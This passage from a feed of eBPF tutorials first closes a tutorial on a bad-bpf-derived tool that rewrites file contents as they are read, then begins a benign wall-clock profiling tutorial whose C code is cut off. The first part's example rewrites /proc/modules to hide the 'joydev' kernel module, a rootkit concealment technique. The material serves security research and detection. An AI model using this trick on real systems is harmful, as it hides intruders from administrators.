&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd &lt;/span&gt;src/27-replace
make
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Run with specified file and text replacement:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; ./replace &lt;span class="nt"&gt;--filename&lt;/span&gt; /path/to/file &lt;span class="nt"&gt;--input&lt;/span&gt; foo &lt;span class="nt"&gt;--replace&lt;/span&gt; bar
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Both &lt;code&gt;input&lt;/code&gt; and &lt;code&gt;replace&lt;/code&gt; must be the same length to avoid buffer corruption. To include newlines in bash, use &lt;code&gt;$'\n'&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;./replace &lt;span class="nt"&gt;-f&lt;/span&gt; /proc/modules &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="s1"&gt;'joydev'&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s1"&gt;$'aaaaa&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s1"&gt;'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The program intercepts all reads of the specified file and replaces matching text transparently. Press Ctrl-C to stop.&lt;/p&gt;
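&lt;p&gt;Since escape sequences make it easy to miscount, a quick length check before running the tool can save a failed attempt. The helper below is a hypothetical convenience, not part of the tutorial's code, and it assumes lengths are compared in bytes after UTF-8 encoding.&lt;/p&gt;

```python
def check_same_length(find, replace):
    """Return the shared byte length, or raise if the two strings differ."""
    find_len = len(find.encode("utf-8"))
    replace_len = len(replace.encode("utf-8"))
    if find_len != replace_len:
        raise ValueError(
            f"length mismatch: {find!r} is {find_len} bytes, "
            f"{replace!r} is {replace_len} bytes"
        )
    return find_len


if __name__ == "__main__":
    print(check_same_length("joydev", "cryptd"))
    # A newline counts as one byte, so five letters plus a newline match six letters.
    print(check_same_length("joydev", "abcde\n"))
```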

&lt;h2&gt;
  
  
  Summary
&lt;/h2&gt;

&lt;p&gt;This tutorial demonstrated how eBPF programs can intercept file read operations and modify data before userspace sees it, without altering the actual file. We explored the three-stage architecture using tail calls to work within verifier constraints, the use of &lt;code&gt;bpf_probe_write_user&lt;/code&gt; for memory manipulation, and practical applications ranging from rootkit techniques to defensive honeypot deployment. Understanding these patterns is crucial for both offensive security research and building detection mechanisms that account for eBPF-based attacks.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;If you'd like to dive deeper into eBPF, check out our tutorial repository at &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial&lt;/a&gt; or visit our website at &lt;a href="https://eunomia.dev/tutorials/" rel="noopener noreferrer"&gt;https://eunomia.dev/tutorials/&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Original bad-bpf project: &lt;a href="https://github.com/pathtofile/bad-bpf" rel="noopener noreferrer"&gt;https://github.com/pathtofile/bad-bpf&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;eBPF tail calls documentation: &lt;a href="https://docs.kernel.org/bpf/prog_sk_lookup.html" rel="noopener noreferrer"&gt;https://docs.kernel.org/bpf/prog_sk_lookup.html&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;BPF verifier and program complexity: &lt;a href="https://www.kernel.org/doc/html/latest/bpf/verifier.html" rel="noopener noreferrer"&gt;https://www.kernel.org/doc/html/latest/bpf/verifier.html&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>ebpf</category>
      <category>kernel</category>
      <category>tracing</category>
    </item>
    <item>
      <title>eBPF Tutorial by Example 32: Wall Clock Profiling with Combined On-CPU and Off-CPU Analysis</title>
      <dc:creator>云微</dc:creator>
      <pubDate>Tue, 16 Dec 2025 07:16:59 +0000</pubDate>
      <link>https://forem.com/yunwei37/ebpf-tutorial-by-example-32-wall-clock-profiling-with-combined-on-cpu-and-off-cpu-analysis-2jcm</link>
      <guid>https://forem.com/yunwei37/ebpf-tutorial-by-example-32-wall-clock-profiling-with-combined-on-cpu-and-off-cpu-analysis-2jcm</guid>
      <description>&lt;p&gt;Performance bottlenecks can hide in two very different places. Your code might be burning CPU cycles in hot loops, or it might be sitting idle waiting for I/O, network responses, or lock contention. Traditional profilers often focus on just one side of this story. But what if you could see both at once?&lt;/p&gt;

&lt;p&gt;This tutorial introduces a complete wall clock profiling solution that combines on-CPU and off-CPU analysis using eBPF. We'll show you how to capture the full picture of where your application spends its time, using two complementary eBPF programs: one samples running code and the other measures blocked time. Whether your performance problems come from computation or waiting, you'll be able to spot them in a unified flame graph view.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;The complete source code: &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/32-wallclock-profiler" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/32-wallclock-profiler&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Understanding Wall Clock Profiling
&lt;/h2&gt;

&lt;p&gt;Wall clock time is the actual elapsed time from start to finish, like checking a stopwatch. For any running process, this time gets divided into two categories. On-CPU time is when your code actively executes on a processor, doing real work. Off-CPU time is when your process exists but isn't running, waiting for something like disk I/O, network packets, or acquiring a lock.&lt;/p&gt;

&lt;p&gt;Traditional CPU profilers only show you the on-CPU story. They sample the stack at regular intervals when your code runs, building a picture of which functions consume CPU cycles. But these profilers are blind to off-CPU time. When your thread blocks on a system call or waits for a mutex, the profiler stops seeing it. This creates a massive blind spot for applications that spend significant time waiting.&lt;/p&gt;

&lt;p&gt;Off-CPU profilers flip the problem around. They track when threads go to sleep and wake up, measuring blocked time and capturing stack traces at blocking points. This reveals I/O bottlenecks and lock contention. But they miss pure computation problems.&lt;/p&gt;

&lt;p&gt;The tools in this tutorial solve both problems by running two eBPF programs simultaneously. The &lt;code&gt;oncputime&lt;/code&gt; tool samples on-CPU execution using perf events. The &lt;code&gt;offcputime&lt;/code&gt; tool hooks into the kernel scheduler to catch blocking operations. A Python script combines the results, normalizing the time scales so you can see CPU-intensive code paths (marked red) and blocking operations (marked blue) in the same flame graph. The combined view shows how wall clock time splits between running and waiting.&lt;/p&gt;

&lt;p&gt;Here's an example flame graph showing combined on-CPU and off-CPU profiling results:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fraw.githubusercontent.com%2Feunomia-bpf%2Fbpf-developer-tutorial%2Fc9d3d65c15fb6528ee378657a05ec0b062eff5b7%2Fsrc%2F32-wallclock-profiler%2Ftests%2Fexample.svg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fraw.githubusercontent.com%2Feunomia-bpf%2Fbpf-developer-tutorial%2Fc9d3d65c15fb6528ee378657a05ec0b062eff5b7%2Fsrc%2F32-wallclock-profiler%2Ftests%2Fexample.svg" alt="Combined Wall Clock Flame Graph Example" width="1200" height="582"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In this visualization, you can clearly see the distinction between CPU-intensive work (shown in red/warm colors marked with &lt;code&gt;_[c]&lt;/code&gt;) and blocking operations (shown in blue/cool colors marked with &lt;code&gt;_[o]&lt;/code&gt;). The relative widths immediately reveal where your application spends its wall clock time.&lt;/p&gt;
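&lt;p&gt;To make the normalization step concrete, here is a minimal sketch of how two profiles could be merged onto one time scale. It is not the tutorial's actual script. It assumes on-CPU data arrives as sample counts per stack, off-CPU data as microseconds per stack, a sampling rate of 49 Hz, and that every frame gets the &lt;code&gt;_[c]&lt;/code&gt; or &lt;code&gt;_[o]&lt;/code&gt; suffix. The function names are hypothetical.&lt;/p&gt;

```python
SAMPLE_HZ = 49  # assumed sampling rate for the on-CPU profile


def annotate(stack, suffix):
    """Append the suffix to every frame of a semicolon-separated stack."""
    return ";".join(frame + suffix for frame in stack.split(";"))


def merge_profiles(oncpu_samples, offcpu_us, sample_hz=SAMPLE_HZ):
    """Combine both profiles into one dict mapping annotated stack to microseconds."""
    us_per_sample = 1_000_000 / sample_hz
    merged = {}
    # On-CPU: convert sample counts into estimated microseconds.
    for stack, samples in oncpu_samples.items():
        key = annotate(stack, "_[c]")
        merged[key] = merged.get(key, 0) + round(samples * us_per_sample)
    # Off-CPU: values are already measured in microseconds.
    for stack, micros in offcpu_us.items():
        key = annotate(stack, "_[o]")
        merged[key] = merged.get(key, 0) + micros
    return merged


if __name__ == "__main__":
    oncpu = {"main;compute": 49}          # 49 samples, about one second on CPU
    offcpu = {"main;read_file": 250_000}  # 250 ms blocked
    for stack, micros in merge_profiles(oncpu, offcpu).items():
        print(stack, micros)
```

&lt;p&gt;Converting samples to microseconds, rather than the other way around, keeps the measured off-CPU durations exact and confines the estimation error to the sampled side.&lt;/p&gt;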

&lt;h2&gt;
  
  
  The Tools: oncputime and offcputime
&lt;/h2&gt;

&lt;p&gt;This tutorial provides two complementary profiling tools. The &lt;code&gt;oncputime&lt;/code&gt; tool samples your process at regular intervals using perf events, capturing stack traces when code actively runs on the CPU. At a default rate of 49 Hz, it wakes up roughly every 20 milliseconds to record where your program is executing. Higher sample counts in the output indicate more CPU time spent in those code paths.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;offcputime&lt;/code&gt; tool takes a different approach. It hooks into the kernel scheduler's context switch mechanism, specifically the &lt;code&gt;sched_switch&lt;/code&gt; tracepoint. When your thread goes off-CPU, the tool records a timestamp and captures the stack trace showing why it blocked. When the thread returns to running, it calculates how long the thread was sleeping. This directly measures I/O waits, lock contention, and other blocking operations in microseconds.&lt;/p&gt;

&lt;p&gt;Both tools use BPF stack maps to efficiently capture kernel and user space call chains with minimal overhead. They aggregate results by unique stack traces, so repeated execution of the same code path gets summed together. The tools can filter by process ID, thread ID, and various other criteria to focus analysis on specific parts of your application.&lt;/p&gt;
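&lt;p&gt;The off-CPU bookkeeping described above can be modeled in a few lines of userspace Python. This is a sketch of the accounting idea only: the class and method names are hypothetical, stacks are represented as plain tuples, and timestamps are assumed to be in nanoseconds.&lt;/p&gt;

```python
class OffCpuTracker:
    """Userspace model of off-CPU accounting driven by context switches."""

    def __init__(self):
        self.start = {}   # tid: (timestamp_ns, stack) recorded at switch-out
        self.totals = {}  # stack: accumulated off-CPU microseconds

    def on_sched_switch(self, now_ns, prev_tid, prev_stack, next_tid):
        # The outgoing thread starts its off-CPU interval now.
        self.start[prev_tid] = (now_ns, prev_stack)
        # The incoming thread ends its interval, if we saw it leave earlier.
        entry = self.start.pop(next_tid, None)
        if entry is None:
            return
        began_ns, stack = entry
        delta_us = (now_ns - began_ns) // 1000
        # Aggregate by stack so repeated blocking on one path sums up.
        self.totals[stack] = self.totals.get(stack, 0) + delta_us


if __name__ == "__main__":
    tracker = OffCpuTracker()
    blocked = ("main", "read", "io_schedule")
    tracker.on_sched_switch(1_000_000, 42, blocked, 7)     # tid 42 blocks
    tracker.on_sched_switch(4_000_000, 7, ("idle",), 42)   # tid 42 resumes
    print(tracker.totals)
```

&lt;p&gt;Keying the totals by stack rather than by thread is what lets the output feed directly into a flame graph: each unique blocking path ends up with a single accumulated duration.&lt;/p&gt;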

&lt;h2&gt;
  
  
  Implementation: Kernel-Space eBPF Programs
&lt;/h2&gt;

&lt;p&gt;Let's examine how these tools work at the eBPF level. We'll start with the on-CPU profiler, then look at the off-CPU profiler, and see how they complement each other.&lt;/p&gt;

&lt;h3&gt;
  
  
  On-CPU Profiling with oncputime
&lt;/h3&gt;

&lt;p&gt;The on-CPU profiler uses perf events to sample execution at regular time intervals. Here's the complete eBPF program:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="c1"&gt;// SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause)&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;vmlinux.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_helpers.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_core_read.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_tracing.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;"oncputime.h"&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="n"&gt;kernel_stacks_only&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;false&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="n"&gt;user_stacks_only&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;false&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="n"&gt;include_idle&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;false&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="n"&gt;filter_by_pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;false&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="n"&gt;filter_by_tid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;false&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_STACK_TRACE&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;u32&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;stackmap&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_HASH&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;key_t&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;u64&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;MAX_ENTRIES&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;counts&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_HASH&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;u32&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;u8&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;MAX_PID_NR&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;pids&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_HASH&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;u32&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;u8&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;MAX_TID_NR&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;tids&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"perf_event"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;do_perf_event&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_perf_event_data&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;u64&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;valp&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="n"&gt;u64&lt;/span&gt; &lt;span class="n"&gt;zero&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;key_t&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{};&lt;/span&gt;
    &lt;span class="n"&gt;u64&lt;/span&gt; &lt;span class="n"&gt;id&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;u32&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;u32&lt;/span&gt; &lt;span class="n"&gt;tid&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_get_current_pid_tgid&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="n"&gt;pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;id&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;id&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;include_idle&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;filter_by_pid&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pids&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;filter_by_tid&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;tids&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;bpf_get_current_comm&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;user_stacks_only&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;kern_stack_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;else&lt;/span&gt;
        &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;kern_stack_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_get_stackid&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;regs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;stackmap&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;kernel_stacks_only&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;user_stack_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;else&lt;/span&gt;
        &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;user_stack_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_get_stackid&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;regs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;stackmap&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
